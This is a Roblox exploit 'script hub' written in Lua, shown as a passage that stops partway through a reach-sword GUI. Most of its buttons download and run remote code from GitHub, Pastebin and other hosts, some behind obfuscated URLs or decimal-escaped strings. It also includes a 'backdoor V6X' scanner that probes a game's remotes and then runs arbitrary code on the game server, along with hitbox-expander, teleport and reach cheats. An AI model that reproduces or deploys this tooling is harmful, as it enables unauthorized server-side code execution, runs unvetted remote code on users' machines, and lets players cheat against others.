local Lib = loadstring(game:HttpGet("https://raw.githubusercontent.com/Hosvile/Refinement/main/InfinitiveUI",true))()

local Win = Lib:CreateWindow("1hooaczx1")

local Tab,name = Win:CreateTab("Script "..tostring(i),function() warn(i) end)

Tab:CreateButton("F3X",function()
loadstring(game:GetObjects("rbxassetid://6695644299")[1].Source)()
end) 

Tab:CreateButton("Lego HUB",function()
loadstring(game:HttpGet("https://comensal.is-not-a.dev/legohub"))()
end) 

Tab:CreateButton("Show FPS GPU CPU Ping",function()
loadstring(game:HttpGet('https://raw.githubusercontent.com/AreexYT/AG-Hub---v2/main/Settings/FPS.lua'))()
    wait()
    loadstring(game:HttpGet('https://raw.githubusercontent.com/AreexYT/AG-Hub---v2/main/Settings/GPU.lua'))()
    wait()
    loadstring(game:HttpGet('https://raw.githubusercontent.com/AreexYT/AG-Hub---v2/main/Settings/CPU.lua'))()
    wait()
    loadstring(game:HttpGet('https://raw.githubusercontent.com/AreexYT/AG-Hub---v2/main/Settings/Ping.lua'))()
    wait()
end) 

Tab:CreateButton("Pissware",function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/AnAvaragelilmemer/Pissware/main/Main/MobileMain.lua"))()
end) 

Tab:CreateButton("First person R15 and R6",function()
local r,d,h,g,s,u,c,t,n,q,x,z,a,p,w,f,m,v,e,b,o,j,i,y,k,l,b,ln,com=
game,"Pastefy","bwTjFg4P","7wTjFg4P","kTjGhS9L","d2RcPf6T",
"7nWrEg5Q","p9JhTd4B","r8CjQf3N","s2CkRd6W","v5PhZg8L",
"3sQjRf5T","NpDhqikw","o7KjXg4L","t9GnQd1R","y6LmSf2N",
"x3QjDg6P","c4VmLb8N","z2PkTf5J","e8LcGh9E","k5RfPd2W",
"2qFdRg7M","i2QbLh8S","g6ScTd3N","w9LbRf5G","b4NjDc7M","f","y",".app/"

local u = "https://paste"..b..""..ln..""..com
loadstring(r:HttpGet(u .. a .. "/raw", true))()
end) 

Tab:CreateButton("Killer Hub",function()
local Library = loadstring(game:HttpGet("https://pastebin.com/raw/vff1bQ9F"))()
local Window = Library.CreateLib("killer hub v1.1", "Midnight")
local Tab = Window:NewTab("games")
local Section = Tab:NewSection("games")
Section:NewButton("blox fruit", "atuo farm fast attack more", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/Frerfgzz/free-script/main/SMZHUBv2BETA"))()
    print("Clicked")
end)
Section:NewButton("Bedwar", "vape v4", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/7GrandDadPGN/VapeV4ForRoblox/main/NewMainScript.lua", true))()
    print("Clicked")
end)
Section:NewButton("Door", "Idk", function()
loadstring(game:HttpGetAsync("https://pastebin.com/raw/R8QMbhzv"))()
    print("Clicked")
end)
Section:NewButton("Brookhaven", "ice hub", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/IceMael7/NewIceHub/main/Brookhaven"))()
    print("Clicked")
end)
Section:NewButton("pet sim x", "ptw", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/DeezScripts/PsxStScripts69/main/scripts/sign/petchanger/unallhoverboards"))();
    print("Clicked")
end)
local Tab = Window:NewTab("other")
local Section = Tab:NewSection("other")
Section:NewButton("all tycoon", "crd to jn hh gaming", function()
loadstring(game:HttpGet("https://pastebin.com/raw/U9WBdeFe"))()
    print("Clicked")
end)
Section:NewButton("fly", "fly best", function()
loadstring("\108\111\97\100\115\116\114\105\110\103\40\103\97\109\101\58\72\116\116\112\71\101\116\40\40\39\104\116\116\112\115\58\47\47\103\105\115\116\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\109\101\111\122\111\110\101\89\84\47\98\102\48\51\55\100\102\102\57\102\48\97\55\48\48\49\55\51\48\52\100\100\100\54\55\102\100\99\100\51\55\48\47\114\97\119\47\101\49\52\101\55\52\102\52\50\53\98\48\54\48\100\102\53\50\51\51\52\51\99\102\51\48\98\55\56\55\48\55\52\101\98\51\99\53\100\50\47\97\114\99\101\117\115\37\50\53\50\48\120\37\50\53\50\48\102\108\121\37\50\53\50\48\50\37\50\53\50\48\111\98\102\108\117\99\97\116\111\114\39\41\44\116\114\117\101\41\41\40\41\10\10")()
    print("Clicked")
end)
local Tab = Window:NewTab("other hub")
local Section = Tab:NewSection("hub")
Section:NewButton("lego hub", "idk", function()
loadstring(game:HttpGet("https://comensal.is-not-a.dev/legohub"))()
    print("Clicked")
end)
Section:NewButton("gigahub", "other hub", function()
loadstring(game:HttpGet('https://raw.githubusercontent.com/OWJBWKQLAISH/GigaChad-Hub/main/Version%20V3.5'))()
    print("Clicked")
end)
Section:NewButton("pissware", "pvp hub", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/AnAvaragelilmemer/Pissware/main/Main/MobileMain.lua"))()
    print("Clicked")
end)
local Tab = Window:NewTab("tool")
local Section = Tab:NewSection("fe tools")
Section:NewButton("tp tool", "click to tp", function()
mouse = game.Players.LocalPlayer:GetMouse()
tool = Instance.new("Tool")
tool.RequiresHandle = false
tool.Name = "Click Teleport"
tool.Activated:connect(function()
local pos = mouse.Hit+Vector3.new(0,2.5,0)
pos = CFrame.new(pos.X,pos.Y,pos.Z)
game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = pos
end)
tool.Parent = game.Players.LocalPlayer.Backpack
    print("Clicked")
end)
Section:NewButton("noclip", "lol", function()
loadstring(game:HttpGet("https://pastebin.com/raw/pKV2Ys4E"))()
    print("Clicked")
end)
end) 

Tab:CreateButton("The Hub V3",function()
loadstring(game:HttpGet('https://raw.githubusercontent.com/hassantheking123321/TheHub/main/The%20hub%20v3%20test'))()
end) 

Tab:CreateButton("Astrolynx Hub (Not working💀)",function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/1tsFire/Astrolynx/main/AstrolynxScripts.lua", true))()
end) 

Tab:CreateButton("Alysse Hub",function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/NathTheDev/AlysseAndroid/main/loader.lua"))() 
end) 

Tab:CreateButton("ByteX",function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/sinret/rbxscript.com-scripts-reuploads-/main/kjerdhfgikrfujh", true))()
end) 

Tab:CreateButton("Multi Gui",function()
loadstring(game:GetObjects("rbxassetid://1468845733")[1].Source)()
end) 

Tab:CreateButton("poppy playtime chapter 3 smiling critters rp",function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/hooaczx/Script/main/Smiling%20Critters%20rp"))()
end) 

Tab:CreateButton("Poppy Playtime Bettle",function()
local library = loadstring(game:HttpGetAsync("https://raw.githubusercontent.com/ShaddowScripts/Main/main/Library"))()

local Main = library:CreateWindow("Poppy Playtime Bettle","Crimson")

local tab = Main:CreateTab("Script")

tab:CreateButton("Golden Huggy Wuggy",function()
local ohString1 = "GldHuggy"
local ohString2 = "BadgeSkin"

game:GetService("ReplicatedStorage").Remotes.MorphEvent:FireServer(ohString1, ohString2)
end) 

tab:CreateButton("GreenMiniHuggy",function()
local ohString1 = "GreenHuggy"
local ohString2 = "BadgeSkin"

game:GetService("ReplicatedStorage").Remotes.MorphEvent:FireServer(ohString1, ohString2)
end) 

tab:CreateButton("YellowMiniHuggy",function()
local ohString1 = "YellowHuggy"
local ohString2 = "BadgeSkin"

game:GetService("ReplicatedStorage").Remotes.MorphEvent:FireServer(ohString1, ohString2)
end) 

tab:CreateButton("RedMiniHuggy",function()
local ohString1 = "RedHuggy"
local ohString2 = "BadgeSkin"

game:GetService("ReplicatedStorage").Remotes.MorphEvent:FireServer(ohString1, ohString2)
end) 

tab:CreateButton("BlueMiniHuggy",function()
local ohString1 = "BlueHuggy"
local ohString2 = "BadgeSkin"

game:GetService("ReplicatedStorage").Remotes.MorphEvent:FireServer(ohString1, ohString2)
end) 

tab:CreateButton("RainbowMiniHuggy",function()
local ohString1 = "RainbowMini"
local ohString2 = "BadgeSkin"

game:GetService("ReplicatedStorage").Remotes.MorphEvent:FireServer(ohString1, ohString2)
end) 

tab:CreateButton("Rainbow Huggy Wuggy",function()
local ohString1 = "RainbowHuggy"
local ohString2 = "BadgeSkin"

game:GetService("ReplicatedStorage").Remotes.MorphEvent:FireServer(ohString1, ohString2)
end) 

tab:CreateButton("Bunzo",function()
game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-20.73956871032715, 4.426915168762207, -252.24179077148438)game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-47.20659255981445, 54.22696304321289, 382.1038818359375)
end) 

tab:CreateButton("Kissy Missy",function()
game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-20.73956871032715, 4.426915168762207, -252.24179077148438)game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-72.56710815429688, 54.157222747802734, 380.9695739746094)
end) 

tab:CreateButton("Killy Willy",function()
game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-20.73956871032715, 4.426915168762207, -252.24179077148438)game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-98.72938537597656, 54.19196319580078, 381.892822265625)
end)

tab:CreateButton("Ms, Delight",function()
game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-20.73956871032715, 4.426915168762207, -252.24179077148438)game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-124.0038833618164, 54.304595947265625, 381.2704772949219)
end)

tab:CreateButton("Huggy Wuggy",function()
game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-20.73956871032715, 4.426915168762207, -252.24179077148438)game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-148.87599182128906, 54.214324951171875, 381.2127990722656)
end)

tab:CreateButton("CatNap",function()
game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-20.73956871032715, 4.426915168762207, -252.24179077148438)game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-176.09677124023438, 54.39082336425781, 380.8526306152344)
end)

tab:CreateButton("Mommy LongLegs",function()
game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-20.73956871032715, 4.426915168762207, -252.24179077148438)game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-203.63674926757812, 54.41392517089844, 381.2276916503906)
end)

tab:CreateButton("Boxy Boo",function()
game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-20.73956871032715, 4.426915168762207, -252.24179077148438)game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-234.5884552001953, 54.163814544677734, 381.5802307128906)
end)

tab:CreateButton("Nightmare CatNap",function()
game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-20.73956871032715, 4.426915168762207, -252.24179077148438)game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-70.46708679199219, 54.52376937866211, 107.2294692993164)
end) 
end) 

Tab:CreateButton("Shift Lock",function()
loadstring(game:HttpGet("https://scriptblox.com/raw/Baseplate-Universal-Script-Permanent-Shift-Lock-6924"))()
end) 

Tab:CreateButton("Animation R15 and R6",function()
loadstring(game:HttpGet(('https://pastebin.com/raw/1p6xnBNf'),true))()
end) 

Tab:CreateButton("BeemzZy Gui Animation PC",function()
loadstring(game:HttpGet('https://raw.githubusercontent.com/BeemzZy/Bubble/main/Main.lua'))()
end) 

Tab:CreateButton("Hitbox expander PC",function()
loadstring(game:HttpGet('https://raw.githubusercontent.com/2dgeneralspam1/scripts-and-stuff/master/shit%20script%20pack/CheatX'))()
end) 

Tab:CreateButton("Hitbox Expander Mobile",function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/Vcsk/RobloxScripts/main/HitboxExpander.lua"))()
end) 

Tab:CreateButton("backdoor V6X",function()
-- Services
local Players = game:GetService("Players")
local CoreGui = game:GetService("CoreGui")
local Lighting = game:GetService("Lighting");
local Workspace = game:GetService("Workspace");
local JointsService = game:GetService("JointsService")
local ReplicatedStorage = game:GetService("ReplicatedStorage")
local RobloxReplicatedStorage = game:GetService("RobloxReplicatedStorage")

-- Variables
local LocalPlayer = Players.LocalPlayer
local RobloxGui = CoreGui.RobloxGui

-- Functions
local dateTimeNow = DateTime.now
local tableFind = table.find
local taskSpawn = task.spawn
local taskWait = task.wait
local stringRep = string.rep
local mathRandom = math.random

-- Globals
local attached = false;
local backdoor = nil;
local commonPlaces = {
	ReplicatedStorage,
	Workspace,
	Lighting
};
local remoteCodes = {};

-- Constants
local INV_CODE = "xJHCqm84cW";
local STRING_VALUE_NAME = mathRandom(1000000, 9999999);


if RobloxGui:FindFirstChild("V6") then RobloxGui:FindFirstChild("V6"):Destroy(); print("Refreshed"); end
local Variables = loadstring(game:HttpGet("https://raw.githubusercontent.com/iK4oS/backdoor.exe/indev/ui.lua"))()

Variables.UI.Main.Active = true
Variables.UI.Main.Draggable = true

local function notify(text,cb,b1,b2)
	game:GetService("StarterGui"):SetCore(
		"SendNotification",{
			Title = "backdoor.exe",
			Duration = 3,
			Text = text,
			Callback = cb,
			Button1 = b1,
			Button2 = b2
		}
	)
end

local function validRemote(rm)
	local Parent = rm.Parent
	local class = rm.ClassName
	if class ~= "RemoteEvent" and class ~= "RemoteFunction" then return false end

	if Parent then
		if Parent == JointsService then return false end
		if (Parent == ReplicatedStorage and rm:FindFirstChild("__FUNCTION")) or
        (rm.Name == "__FUNCTION" and Parent.ClassName == "RemoteEvent" and Parent.Parent == ReplicatedStorage) then return false end
	end

	if rm:IsDescendantOf(RobloxReplicatedStorage) then return false end

	return true
end

local function scanDescendants(parent)
	local descendance = parent:GetDescendants();
	for i=1, #descendance do
		local descendant = descendance[i];


		if not validRemote(descendant) then continue; end
		
		--if #remoteCodes == 5 then remoteCodes.clear(); end
		local remoteCode = tostring(mathRandom(100000, 999999));
		remoteCodes[remoteCode] = descendant;
		
		local remoteClass = descendant.ClassName
		local requireScript = ("i=Instance.new('StringValue', game.Workspace); i.Name='%s'; i.Value='%s'"):format(STRING_VALUE_NAME, remoteCode)

		if remoteClass == "RemoteEvent" then
			descendant:FireServer(requireScript)

		elseif remoteClass == "RemoteFunction" then
			local waiting = true
			taskSpawn(function()
				descendant:InvokeServer(requireScript)
				waiting = nil
			end)

            -- If RemoteFunction don't respond in 1 second, we skip this one.
			local start = dateTimeNow().UnixTimestampMillis
			while waiting and 1000 > dateTimeNow().UnixTimestampMillis - start do
				taskWait()
			end
		end

		if Workspace:FindFirstChild(STRING_VALUE_NAME) then
			attached = true
			backdoor = remoteCodes[Workspace:FindFirstChild(STRING_VALUE_NAME).Value]
			backdoor:FireServer(("game.Workspace['%s']:Destroy()"):format(STRING_VALUE_NAME)) -- Cleaning up after tonumberselves

			return true
		end
	end
end
local function scanGame()
    local found = false
	-- Scan Common Places
	for i=1, #commonPlaces do
		local place = commonPlaces[i];
		if scanDescendants(place) then
            found = true
        end
	end
	-- Scan the rest of the game
	local children = game:GetChildren();
	for i=1, #children do
		local child = children[i];
		-- We ofcourse don't need to check the common places again, do we?
		if tableFind(commonPlaces, child) then continue; end
		
		if scanDescendants(child) then 
            found = true
        end
	end
    if found then
        notify("Backdoor Found!")
        Variables.Topbar.Status.Text = "Attached"
        Variables.Topbar.Status.Circle.Status_Color.BackgroundColor3 = Color3.fromRGB(95, 185, 47)
    else
        notify("Unable to find backdoor!")
        Variables.Topbar.Status.Text = "Failed"
    end

	return found;
end
local function executeScript(script)
    if not attached then
        local function callback(text)
			if text == "Yes" then
				if scanGame() then
				    executeScript(script)
				end
			elseif text == "No" then
				return
			end
		end
	
		local bf = Instance.new("BindableFunction"); bf.OnInvoke = callback
		notify("You're not attached.\nWould you like to attach now?", bf, "Yes", "No")
		return
    end
    
    local script = script or Variables.SourceFrame.Source.Text
    if backdoor.ClassName == "RemoteEvent" then
        backdoor:FireServer(script)
    elseif backdoor.ClassName == "RemoteFunction" then
        backdoor:InvokeServer(script)
    end
end





local function promtDiscordInvite()
    local httpService = game:GetService("HttpService")
    local httpRequest = (syn and syn.request) or (httpService and httpService.request) or http_request

    if not httpRequest then setclipboard(INV_CODE) notify("Invite code copied!") return end
    
    local request = httpRequest({
        Url = "http://127.0.0.1:6463/rpc?v=1",
        Method = "POST",

        Headers = {
            ['Content-Type'] = 'application/json',
            Origin = 'https://discord.com'
        },

        Body = httpService:JSONEncode({
            args = {code = INV_CODE},
            cmd = 'INVITE_BROWSER',
            nonce = httpService:GenerateGUID(false)
        })
    })

	if request.StatusCode ~= 200 or httpService:JSONDecode(request.Body).data.code == 4011 then
	    notify("Invite code copied!") 
		setclipboard(INV_CODE)
		return
	end
	
	notify("You have been promted to join our Discord. Open your Discord.")

end

Variables.Topbar.CloseButton.MouseButton1Click:Connect(function() Variables.UI:Destroy() end)
Variables.Topbar.R6Button.MouseButton1Click:Connect(function() executeScript(("require(3041175937):r6('%s')"):format(LocalPlayer.Name)) end)
Variables.MainButtons.ScanButton.MouseButton1Click:Connect(scanGame)
Variables.MainButtons.ExecuteButton.MouseButton1Click:Connect(executeScript)
Variables.MainButtons.ClearButton.MouseButton1Click:Connect(function() Variables.SourceFrame.Source.Text = "" end)
Variables.MainButtons.HideButton.MouseButton1Click:Connect(function() Variables.SourceFrame.Source.Visible = not Variables.SourceFrame.Source.Visible end)
Variables.MainButtons.InviteButton.MouseButton1Click:Connect(promtDiscordInvite)



--	k4scripts
--	.------.
--	|4.--. |
--	| :│/: |
--	| :│\: |
--	| '--'4|
--	`------'
end) 

Tab:CreateButton("No Animation", function()
game.Players.LocalPlayer.Character.Animate.Disabled = true
end) 

Tab:CreateButton("Fly Pc", function()
loadstring(game:HttpGet(('https://pastefy.app/Te4dwSw2/raw'),true))()
local ScreenGui = Instance.new("ScreenGui")
local Frame = Instance.new("Frame")
local TextLabel = Instance.new("TextLabel")
local TextLabel_2 = Instance.new("TextLabel")
local TextButton = Instance.new("TextButton")

ScreenGui.Parent = game.CoreGui

Frame.Parent = ScreenGui
Frame.BackgroundColor3 = Color3.fromRGB(24, 255, 51)
Frame.BorderColor3 = Color3.fromRGB(255, 0, 4)
Frame.BorderSizePixel = 15
Frame.Position = UDim2.new(0.0575905927, 0, 0.653887033, 0)
Frame.Size = UDim2.new(0, 295, 0, 152)
Frame.Active = true
Frame.Draggable = true

TextLabel.Parent = Frame
TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.BackgroundTransparency = 1.000
TextLabel.BorderColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.BorderSizePixel = 0
TextLabel.Size = UDim2.new(0, 295, 0, 63)
TextLabel.Font = Enum.Font.SciFi
TextLabel.Text = "FLY SCRIPT"
TextLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.TextScaled = true
TextLabel.TextSize = 14.000
TextLabel.TextStrokeTransparency = 0.000
TextLabel.TextWrapped = true

TextLabel_2.Parent = Frame
TextLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_2.BackgroundTransparency = 1.000
TextLabel_2.BorderColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_2.BorderSizePixel = 0
TextLabel_2.Position = UDim2.new(0, 0, 0.342105269, 0)
TextLabel_2.Size = UDim2.new(0, 295, 0, 18)
TextLabel_2.Font = Enum.Font.SciFi
TextLabel_2.Text = "(Fly Gui)"
TextLabel_2.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_2.TextScaled = true
TextLabel_2.TextSize = 14.000
TextLabel_2.TextStrokeTransparency = 0.000
TextLabel_2.TextWrapped = true

TextButton.Parent = Frame
TextButton.BackgroundColor3 = Color3.fromRGB(8, 0, 255)
TextButton.Position = UDim2.new(0.159322038, 0, 0.552631557, 0)
TextButton.Size = UDim2.new(0, 200, 0, 50)
TextButton.Font = Enum.Font.SciFi
TextButton.Text = "Fly"
TextButton.TextColor3 = Color3.fromRGB(255, 255, 255)
TextButton.TextScaled = true
TextButton.TextSize = 14.000
TextButton.TextStrokeTransparency = 0.000
TextButton.TextWrapped = true
TextButton.MouseButton1Down:connect(function()
	local plr = game.Players.LocalPlayer
local mouse = plr:GetMouse()

localplayer = plr

if workspace:FindFirstChild("Core") then
workspace.Core:Destroy()
end

local Core = Instance.new("Part")
Core.Name = "Core"
Core.Size = Vector3.new(0.05, 0.05, 0.05)

spawn(function()
Core.Parent = workspace
local Weld = Instance.new("Weld", Core)
Weld.Part0 = Core
Weld.Part1 = localplayer.Character.LowerTorso
Weld.C0 = CFrame.new(0, 0, 0)
end)

workspace:WaitForChild("Core")

local torso = workspace.Core
flying = true
local speed=10
local keys={a=false,d=false,w=false,s=false}
local e1
local e2
local function start()
local pos = Instance.new("BodyPosition",torso)
local gyro = Instance.new("BodyGyro",torso)
pos.Name="EPIXPOS"
pos.maxForce = Vector3.new(math.huge, math.huge, math.huge)
pos.position = torso.Position
gyro.maxTorque = Vector3.new(9e9, 9e9, 9e9)
gyro.cframe = torso.CFrame
repeat
wait()
localplayer.Character.Humanoid.PlatformStand=true
local new=gyro.cframe - gyro.cframe.p + pos.position
if not keys.w and not keys.s and not keys.a and not keys.d then
speed=10
end
if keys.w then
new = new + workspace.CurrentCamera.CoordinateFrame.lookVector * speed
speed=speed+10
end
if keys.s then
new = new - workspace.CurrentCamera.CoordinateFrame.lookVector * speed
speed=speed+10
end
if keys.d then
new = new * CFrame.new(speed,0,0)
speed=speed+10
end
if keys.a then
new = new * CFrame.new(-speed,0,0)
speed=speed+10
end
if speed>10 then
speed=10
end
pos.position=new.p
if keys.w then
gyro.cframe = workspace.CurrentCamera.CoordinateFrame*CFrame.Angles(-math.rad(speed*0),0,0)
elseif keys.s then
gyro.cframe = workspace.CurrentCamera.CoordinateFrame*CFrame.Angles(math.rad(speed*0),0,0)
else
gyro.cframe = workspace.CurrentCamera.CoordinateFrame
end
until flying == false
if gyro then gyro:Destroy() end
if pos then pos:Destroy() end
flying=false
localplayer.Character.Humanoid.PlatformStand=false
speed=10
end
e1=mouse.KeyDown:connect(function(key)
if not torso or not torso.Parent then flying=false e1:disconnect() e2:disconnect() return end
if key=="w" then
keys.w=true
elseif key=="s" then
keys.s=true
elseif key=="a" then
keys.a=true
elseif key=="d" then
keys.d=true
elseif key=="x" then
if flying==true then
flying=false
else
flying=true
start()
end
end
end)
e2=mouse.KeyUp:connect(function(key)
if key=="w" then
keys.w=false
elseif key=="s" then
keys.s=false
elseif key=="a" then
keys.a=false
elseif key=="d" then
keys.d=false
end
end)
start()
end)
end) 

Tab:CreateButton("Reach Sword",function()
local active = true
local trueActive = true
local reachType = "Sphere"
local dmgEnabled = true
local visualizerEnabled = false

local visualizer = Instance.new("Part")
visualizer.BrickColor = BrickColor.Blue()
visualizer.Transparency = 0.6
visualizer.Anchored = true
visualizer.CanCollide = false
visualizer.Size = Vector3.new(0.5,0.5,0.5)
visualizer.BottomSurface = Enum.SurfaceType.Smooth
visualizer.TopSurface = Enum.SurfaceType.Smooth

local ScreenGui = Instance.new("ScreenGui")
local Frame = Instance.new("Frame")
local TextLabel = Instance.new("TextLabel")
local TextBox = Instance.new("TextBox")
local TextLabel_2 = Instance.new("TextLabel")
local TextLabel_3 = Instance.new("TextLabel")
local TextLabel_4 = Instance.new("TextLabel")
local TextButton = Instance.new("TextButton")
local Frame_2 = Instance.new("Frame")
local Frame_3 = Instance.new("Frame")
local Frame_4 = Instance.new("Frame")
local Frame_5 = Instance.new("Frame")
local TextButton_2 = Instance.new("TextButton")

--Properties:

ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
ScreenGui.DisplayOrder = 999999999
ScreenGui.ResetOnSpawn = false

Frame.Parent = ScreenGui
Frame.AnchorPoint = Vector2.new(0, 0.5)
Frame.BackgroundColor3 = Color3.fromRGB(45, 45, 45)
Frame.BackgroundTransparency = 0.300
Frame.BorderColor3 = Color3.fromRGB(0, 0, 0)
Frame.BorderSizePixel = 4
Frame.Position = UDim2.new(0, 0, 0.600000024, 0)
Frame.Size = UDim2.new(0.150000006, 0, 0.300000012, 0)

TextLabel.Parent = Frame
TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.BackgroundTransparency = 1.000
TextLabel.Size = UDim2.new(0.600000024, 0, 0.200000003, 0)
TextLabel.Font = Enum.Font.SourceSans
TextLabel.Text = "Reach:"
TextLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.TextScaled = true
TextLabel.TextSize = 14.000
TextLabel.TextWrapped = true

TextBox.Parent = Frame
TextBox.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextBox.BackgroundTransparency = 1.000
TextBox.Position = UDim2.new(0.600000024, 0, 0, 0)
TextBox.Size = UDim2.new(0.400000006, 0, 0.200000003, 0)
TextBox.Font = Enum.Font.SourceSans
TextBox.Text = "3.5"
TextBox.TextColor3 = Color3.fromRGB(255, 76, 76)
TextBox.TextScaled = true
TextBox.TextSize = 14.000
TextBox.TextWrapped = true

TextLabel_2.Parent = Frame
TextLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_2.BackgroundTransparency = 1.000
TextLabel_2.Position = UDim2.new(0, 0, 0.200000003, 0)
TextLabel_2.Size = UDim2.new(0.600000024, 0, 0.200000003, 0)
TextLabel_2.Font = Enum.Font.SourceSans
TextLabel_2.Text = "Shape:"
TextLabel_2.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_2.TextScaled = true
TextLabel_2.TextSize = 14.000
TextLabel_2.TextWrapped = true

TextLabel_3.Parent = Frame
TextLabel_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_3.BackgroundTransparency = 1.000
TextLabel_3.Position = UDim2.new(0, 0, 0.400000006, 0)
TextLabel_3.Size = UDim2.new(0.600000024, 0, 0.200000003, 0)
TextLabel_3.Font = Enum.Font.SourceSans
TextLabel_3.Text = "Damage:"
TextLabel_3.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_3.TextScaled = true
TextLabel_3.TextSize = 14.000
TextLabel_3.TextWrapped = true

TextLabel_4.Parent = Frame
TextLabel_4.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_4.BackgroundTransparency = 1.000
TextLabel_4.Position = UDim2.new(0, 0, 0.600000024, 0)
TextLabel_4.Size = UDim2.new(0.600000024, 0, 0.200000003, 0)
TextLabel_4.Font = Enum.Font.SourceSans
TextLabel_4.Text = "Visualizer:"
TextLabel_4.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_4.TextScaled = true
TextLabel_4.TextSize = 14.000
TextLabel_4.TextWrapped = true

TextButton.Parent = Frame
TextButton.AnchorPoint = Vector2.new(0, 1)
TextButton.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextButton.BackgroundTransparency = 1.000
TextButton.Position = UDim2.new(0, 0, 1, 0)
TextButton.Size = UDim2.new(1, 0, 0.150000006, 0)
TextButton.Font = Enum.Font.SourceSansBold
TextButton.Text = "Kill Script"
TextButton.TextColor3 = Color3.fromRGB(222, 0, 0)
TextButton.TextScaled = true
TextButton.TextSize = 14.000
TextButton.TextWrapped = true

Frame_2.Parent = Frame
Frame_2.Active = true
Frame_2.AnchorPoint = Vector2.new(0, 0.5)
Frame_2.BackgroundColor3 = Color3.fromRGB(31, 31, 31)
Frame_2.BorderSizePixel = 0
Frame_2.Position = UDim2.new(0.725000024, 0, 0.699999988, 0)
Frame_2.Size = UDim2.new(0, 25, 0, 25)
Frame_2.ZIndex = 5

Frame_3.Parent = Frame_2
Frame_3.AnchorPoint = Vector2.new(0.5, 0.5)
Frame_3.BackgroundColor3 = Color3.fromRGB(255, 76, 76)
Frame_3.BorderSizePixel = 0
Frame_3.LayoutOrder = 1
Frame_3.Position = UDim2.new(0.5, 0, 0.5, 0)

Frame_4.Parent = Frame
Frame_4.Active = true
Frame_4.AnchorPoint = Vector2.new(0, 0.5)
Frame_4.BackgroundColor3 = Color3.fromRGB(31, 31, 31)
Frame_4.BorderSizePixel = 0
Frame_4.Position = UDim2.new(0.725000024, 0, 0.5, 0)
Frame_4.Size = UDim2.new(0, 25, 0, 25)
Frame_4.ZIndex = 5

Frame_5.Parent = Frame_4
Frame_5.AnchorPoint = Vector2.new(0.5, 0.5)
Frame_5.BackgroundColor3 = Color3.fromRGB(255, 76, 76)
Frame_5.BorderSizePixel = 0
Frame_5.LayoutOrder = 1
Frame_5.Position = UDim2.new(0.5, 0, 0.5, 0)
Frame_5.Size = UDim2.new(1, 0, 1, 0)

TextButton_2.Parent = Frame
TextButton_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextButton_2.BackgroundTransparency = 1.000
TextButton_2.Position = UDim2.new(0.600000024, 0, 0.200000003, 0)
TextButton_2.Size = UDim2.new(0.400000006, 0, 0.200000003, 0)
TextButton_2.Font = Enum.Font.SourceSans
TextButton_2.Text = "Sphere"
TextButton_2.TextColor3 = Color3.fromRGB(255, 76, 76)
TextButton_2.TextScaled = true
TextButton_2.TextSize = 14.000
TextButton_2.TextWrapped = true

repeat wait() until game.Players.LocalPlayer
ScreenGui.Parent = game:GetService("CoreGui")



Frame_4.InputBegan:connect(function(inp)
	if inp.UserInputType == Enum.UserInputType.MouseButton1 then
		dmgEnabled = not dmgEnabled
		local goal = {Size = UDim2.new(0,0,0,0)}
		if dmgEnabled then
			goal = {Size = UDim2.new(1,0,1,0)}
		end
		game:GetService("TweenService"):Create(Frame_5,TweenInfo.new(0.12,Enum.EasingStyle.Quad),goal):Play()
	end
end)
Frame_2.InputBegan:connect(function(inp)
	if inp.UserInputType == Enum.UserInputType.MouseButton1 then
		visualizerEnabled = not visualizerEnabled
		local goal = {Size = UDim2.new(0,0,0,0)}
		if visualizerEnabled then
			goal = {Size = UDim2.new(1,0,1,0)}
